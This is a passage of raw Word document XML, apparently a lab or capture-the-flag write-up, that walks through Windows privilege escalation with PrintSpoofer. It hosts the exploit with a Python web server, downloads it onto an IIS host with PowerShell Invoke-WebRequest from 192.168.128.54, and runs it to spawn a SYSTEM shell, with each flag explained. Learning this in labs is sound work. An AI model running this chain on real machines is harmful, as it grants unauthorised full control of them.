        <w:t>whoami /priv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C19926">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="15132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8595" cy="1513205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2659CDA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Notice the enabled privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259EE822">
      <w:pPr>
        <w:pStyle w:val="10"/>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Escalate to SYSTEM privileges through PrintSpoofer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72480A2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Change directory to a temporary one</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E7D1FC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cd tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BB38CC">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Get PrintSpoofer, a tool used for privilege escalation in Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3662F46A">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CFB781">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="SimSun" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Make the temporary folder a temporary web server running in port 8000 so that it is easier to download the files from the folder by just access it from the web/URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CA55BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>python3 -m http.server 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529FB2BC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="4859020"/>
            <wp:effectExtent l="0" t="0" r="381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3040" cy="4859020"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0089087C">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#Back to the remote windows server terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538D05CB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>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-133985</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>262890</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5715000" cy="1476375"/>
                <wp:effectExtent l="6350" t="6350" r="12700" b="22225"/>
                <wp:wrapNone/>
                <wp:docPr id="39" name="Rectangle 39"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="1009015" y="6584315"/>
                          <a:ext cx="5715000" cy="147637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5pt;margin-top:20.7pt;height:116.25pt;width:450pt;z-index:251663360;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJA4qFjrdoAAAAK&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PMU/DMBCFdyT+g3VIbK3tkNI05NIhiAGBVFFY2K6xSQKx&#10;HcVOUv49ZoLx9D69912xP5uezXr0nbMIci2AaVs71dkG4e31YZUB84Gsot5ZjfCtPezLy4uCcuUW&#10;+6LnY2hYLLE+J4Q2hCHn3NetNuTXbtA2Zh9uNBTiOTZcjbTEctPzRIhbbqizcaGlQVetrr+Ok0F4&#10;33zyQ1ctND0/3j9t5tGJKnWI11dS3AEL+hz+YPjVj+pQRqeTm6zyrEdYJVJGFCGVKbAIZNtsB+yE&#10;kGxvdsDLgv9/ofwBUEsDBBQAAAAIAIdO4kAvB/l+awIAAN0EAAAOAAAAZHJzL2Uyb0RvYy54bWyt&#10;VE1PGzEQvVfqf7B8L7sJCYGIDYqIqCqhgqBVz47Xu2vJX7WdbOiv77N3gZT2wKE5ODOe2Tee5ze+&#10;vDpoRfbCB2lNRScnJSXCcFtL01b0+7ebT+eUhMhMzZQ1oqJPItCr1ccPl71biqntrKqFJwAxYdm7&#10;inYxumVRBN4JzcKJdcIg2FivWYTr26L2rAe6VsW0LM+K3vraectFCNjdDEE6Ivr3ANqmkVxsLN9p&#10;YeKA6oViES2FTrpAV/m0TSN4vGuaICJRFUWnMa8oAnub1mJ1yZatZ66TfDwCe88R3vSkmTQo+gK1&#10;YZGRnZd/QWnJvQ22iSfc6mJoJDOCLiblG24eO+ZE7gVUB/dCevh/sPzr/t4TWVf09IISwzRu/AGs&#10;MdMqQbAHgnoXlsh7dPd+9ALM1O2h8Tr9ow9ygJjK8qKczCl5qujZ/Hx2CjsTLA6RcCTMF5N5WYJ7&#10;jozJbHF2usgZxSuU8yF+FlaTZFTU4yyZWLa/DRFgSH1OSZWNvZFK5SLKkB6o00UuwCDNBpJALe3Q&#10;XjAtJUy10DyPPkMGq2SdPk9Awbfba+XJniWl5F86O8r9kZZqb1johrwcGlrUMmIslNQVPT/+WhmA&#10;JAYHzpK1tfUTSPd2UGNw/EYC9paFeM885AeCMKDxDkujLJqyo0VJZ/2vf+2nfKgCUUp6yBkN/9wx&#10;LyhRXwz0cjGZzZL+szObL6Zw/HFkexwxO31twcMET4Hj2Uz5UT2bjbf6B+Z4naoixAxH7YHa0bmO&#10;w5jhJeBivc5p0Lxj8dY8Op7Ahwtc76JtZL7bV3ZG0qD6fAfjhKaxOvZz1uurtP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4qFjrdoAAAAKAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYu&#10;eG1sUEsBAhQAFAAAAAgAh07iQC8H+X5rAgAA3QQAAA4AAAAAAAAAAQAgAAAAKQEAAGRycy9lMm9E&#10;b2MueG1sUEsFBgAAAAAGAAYAWQEAAAYGAAAAAA==&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1pt" color="#000000 [3213]" miterlimit="8" joinstyle="miter"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cd C:\inetpub\wwwroot\nt4wrksv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A83C91">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#cd is for changing directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63585E12">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#C:\inetpub\wwwroot\ is the default root installation directory for Microsoft IIS (Internet Information Services), the Windows web server software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D4AACA">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#nt4wrksv is a specified shared subfolder where everything that follows will be hosted there.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5A3DD4">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B8C3E4">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="068602C2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="009F63B3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B8CEFAD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs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-67945</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>416560</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5457825" cy="2343150"/>
                <wp:effectExtent l="6350" t="6350" r="22225" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="40" name="Rectangle 40"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="1075055" y="1330960"/>
                          <a:ext cx="5457825" cy="23431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5pt;margin-top:32.8pt;height:184.5pt;width:429.75pt;z-index:251664384;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJA8a5DjdkAAAAK&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PQU+EMBCF7yb+h2ZMvO22KLAEGfaA8WA0Ma5e9talI6C0&#10;JW2B9d9bT3qczJf3vlftz3pkCzk/WIOQbAUwMq1Vg+kQ3t8eNgUwH6RRcrSGEL7Jw76+vKhkqexq&#10;Xmk5hI7FEONLidCHMJWc+7YnLf3WTmTi78M6LUM8XceVk2sM1yO/ESLnWg4mNvRyoqan9uswa4Rj&#10;9slfhmaV8/Pj/VO2OCua1CJeXyXiDligc/iD4Vc/qkMdnU52NsqzEWGTiF1EEfIsBxaBIi3ilhNC&#10;epvmwOuK/59Q/wBQSwMEFAAAAAgAh07iQPXt67hpAgAA3QQAAA4AAABkcnMvZTJvRG9jLnhtbK1U&#10;y27bMBC8F+g/ELw3kl95GJEDI0aKAkETJC16pilKIsBXSdpy+vUdUkripj3kUB/kpXY0y50d8vLq&#10;oBXZCx+kNRWdnJSUCMNtLU1b0e/fbj6dUxIiMzVT1oiKPolAr1YfP1z2bimmtrOqFp6AxIRl7yra&#10;xeiWRRF4JzQLJ9YJg2RjvWYRS98WtWc92LUqpmV5WvTW185bLkLA282QpCOjfw+hbRrJxcbynRYm&#10;DqxeKBbRUuikC3SVd9s0gse7pgkiElVRdBrzE0UQb9OzWF2yZeuZ6yQft8Des4U3PWkmDYq+UG1Y&#10;ZGTn5V9UWnJvg23iCbe6GBrJiqCLSflGm8eOOZF7gdTBvYge/h8t/7q/90TWFZ1DEsM0Jv4A1Zhp&#10;lSB4B4F6F5bAPbp7P64CwtTtofE6/aMPcoCZyrNFuVhQ8oR4NisvTkeBxSESDsBivjg7nwLAgZjO&#10;5rPJIiOKVyrnQ/wsrCYpqKjHXrKwbH8bIsoD+gxJlY29kUrlKSpDetSdnpXohDNYs4ElEGqH9oJp&#10;KWGqhed59JkyWCXr9HkiCr7dXitP9iw5Jf9S7yj3ByzV3rDQDbicGjykZcSxUFJX9Pz4a2VAkhQc&#10;NEvR1tZPEN3bwY3B8RsJ2lsW4j3zsB/2jwMa7/BolEVTdowo6az/9a/3CQ9XIEtJDzuj4Z875gUl&#10;6ouBXy4m8zTgmBeYwhQLf5zZHmfMTl9b6DDBVeB4DhM+quew8Vb/wDlep6pIMcNRe5B2XFzH4Zjh&#10;JuBivc4weN6xeGseHU/kwwDXu2gbmWf7qs4oGlyfZzCe0HSsjtcZ9Xorr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8a5DjdkAAAAKAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1s&#10;UEsBAhQAFAAAAAgAh07iQPXt67hpAgAA3QQAAA4AAAAAAAAAAQAgAAAAKAEAAGRycy9lMm9Eb2Mu&#10;eG1sUEsFBgAAAAAGAAYAWQEAAAMGAAAAAA==&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1pt" color="#000000 [3213]" miterlimit="8" joinstyle="miter"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell -c "Invoke-WebRequest -Uri http://192.168.128.54:8000/PrintSpoofer64.exe -OutFile PrintSpoofer64.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFAF768">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#powershell launches Microsoft's administrative automation and scripting engine from the command prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03603C2D">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#-c stands for command and it tells powershell to execute the exact code that follows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06898FC7">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#Invoke-WebRequest is the in built command used to request web servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7989DD48">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#-Uri http://192.168.128.54:8000/...specifies where the web address of the target file is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A470DE2">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#-OutFile PrintSpoofer64.exe gives the estination and the file name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78100A16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PrintSpoofer64.exe -i -c cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A22455">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EE46D23">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>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-191770</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>81280</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5610225" cy="1714500"/>
                <wp:effectExtent l="6350" t="6350" r="22225" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="41" name="Rectangle 41"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="951230" y="4164965"/>
                          <a:ext cx="5610225" cy="171450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pt;margin-top:6.4pt;height:135pt;width:441.75pt;z-index:251665408;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJAV9mYV9cAAAAK&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PQU+EMBCF7yb+h2ZMvO22C2IIUvaA8WA0Ma5evM3SCiid&#10;Elpg/feOJ/c473158165P7lBLHYKvScNu60CYanxpqdWw/vbwyYHESKSwcGT1fBjA+yry4sSC+NX&#10;erXLIbaCQygUqKGLcSykDE1nHYatHy2x9+knh5HPqZVmwpXD3SATpW6lw574Q4ejrTvbfB9mp+Ej&#10;+5Ivfb3i/Px4/5Qtk1f1jdf6+mqn7kBEe4r/MPzV5+pQcaejn8kEMWjYpCphlI2EJzCQZ2kK4qgh&#10;yVmRVSnPJ1S/UEsDBBQAAAAIAIdO4kAn666YagIAANwEAAAOAAAAZHJzL2Uyb0RvYy54bWytVE1v&#10;2zAMvQ/YfxB0Xx17SdoGdYqgQYcBxRqsG3ZWZDkWoK9JSpzu1+9Jdtus26GH5aCQJv1IPj366vqo&#10;FTkIH6Q1NS3PJpQIw20jza6m37/dfrigJERmGqasETV9FIFeL9+/u+rdQlS2s6oRngDEhEXvatrF&#10;6BZFEXgnNAtn1gmDYGu9ZhGu3xWNZz3QtSqqyWRe9NY3zlsuQsDT9RCkI6J/C6BtW8nF2vK9FiYO&#10;qF4oFjFS6KQLdJm7bVvB433bBhGJqikmjflEEdjbdBbLK7bYeeY6yccW2FtaeDWTZtKg6DPUmkVG&#10;9l7+BaUl9zbYNp5xq4thkMwIpignr7h56JgTeRZQHdwz6eH/wfIvh40nsqnptKTEMI0b/wrWmNkp&#10;QfAMBPUuLJD34DZ+9ALMNO2x9Tr9Yw5yrOnlrKw+gtnHhDafXs5nA7/iGAlHfDYvJ1U1o4Qjozwv&#10;p7NJvoHiBcn5ED8Jq0kyaurRSuaVHe5CRHWkPqWkwsbeSqXyJSpDeqBW58AknEGZLRQBUztMF8yO&#10;EqZ2kDyPPkMGq2STXk9Awe+2N8qTA0tCyb/UO8r9kZZqr1nohrwcGkbUMmIrlNQ1vTh9WxmAJAIH&#10;ypK1tc0jOPd2EGNw/FYC9o6FuGEe6kP/2M94j6NVFkPZ0aKks/7Xv56nfIgCUUp6qBkD/9wzLyhR&#10;nw3kcllOp4CN2ZnOzis4/jSyPY2Yvb6x4AGKQHfZTPlRPZmtt/oH1niVqiLEDEftgdrRuYnDluFD&#10;wMVqldMgecfinXlwPIEPF7jaR9vKfLcv7IykQfT5DsYFTVt16uesl4/S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X2ZhX1wAAAAoBAAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQ&#10;SwECFAAUAAAACACHTuJAJ+uumGoCAADcBAAADgAAAAAAAAABACAAAAAmAQAAZHJzL2Uyb0RvYy54&#10;bWxQSwUGAAAAAAYABgBZAQAAAgYAAAAA&#10;">
                <v:fill on="f" focussize="0,0"/>
                <v:stroke weight="1pt" color="#000000 [3213]" miterlimit="8" joinstyle="miter"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#PrintSpoofer64.exe specifies the exploit binary being executed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5040A541">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#-i instructs program to run in interactive mode where they can type commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118DC744">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#-c cmd specifies the command printspoofer should launch after successfully escalating privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769EF1BA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="351C6CB5">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>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-77470</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>274955</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4933950" cy="304800"/>
                <wp:effectExtent l="6350" t="6350" r="12700" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="42" name="Rectangle 42"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="1065530" y="6299200"/>
                          <a:ext cx="4933950" cy="30480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pt;margin-top:21.65pt;height:24pt;width:388.5pt;z-index:251666432;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJAQKc/AtkAAAAJ&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2Py07DMBBF90j8gzVI7Fo7j5YSMukiiAUCCVHYdDeNTRKI&#10;7ch2kvL3mBUsR3N077nl/qwHNivne2sQkrUApkxjZW9ahPe3h9UOmA9kJA3WKIRv5WFfXV6UVEi7&#10;mFc1H0LLYojxBSF0IYwF577plCa/tqMy8fdhnaYQT9dy6WiJ4XrgqRBbrqk3saGjUdWdar4Ok0Y4&#10;bj75S18vND0/3j9tZmdFnVvE66tE3AEL6hz+YPjVj+pQRaeTnYz0bEBYJWkaUYQ8y4BF4Gabxy0n&#10;hNskA16V/P+C6gdQSwMEFAAAAAgAh07iQPVSdEdqAgAA3AQAAA4AAABkcnMvZTJvRG9jLnhtbK1U&#10;y27bMBC8F+g/ELw38jOJjciBYcNFgaAJkhY90xQlEeCrJG05/foOKeXRtIccqoO01I5md4ZLXV2f&#10;tCJH4YO0pqTjsxElwnBbSdOU9Pu33adLSkJkpmLKGlHSRxHo9erjh6vOLcXEtlZVwhOQmLDsXEnb&#10;GN2yKAJvhWbhzDphkKyt1yxi6Zui8qwDu1bFZDQ6LzrrK+ctFyHg7bZP0oHRv4fQ1rXkYmv5QQsT&#10;e1YvFIuQFFrpAl3lbuta8Hhb10FEokoKpTHfUQTxPt2L1RVbNp65VvKhBfaeFt5o0kwaFH2m2rLI&#10;yMHLv6i05N4GW8czbnXRC8mOQMV49Mabh5Y5kbXA6uCeTQ//j5Z/Pd55IquSziaUGKax4/dwjZlG&#10;CYJ3MKhzYQncg7vz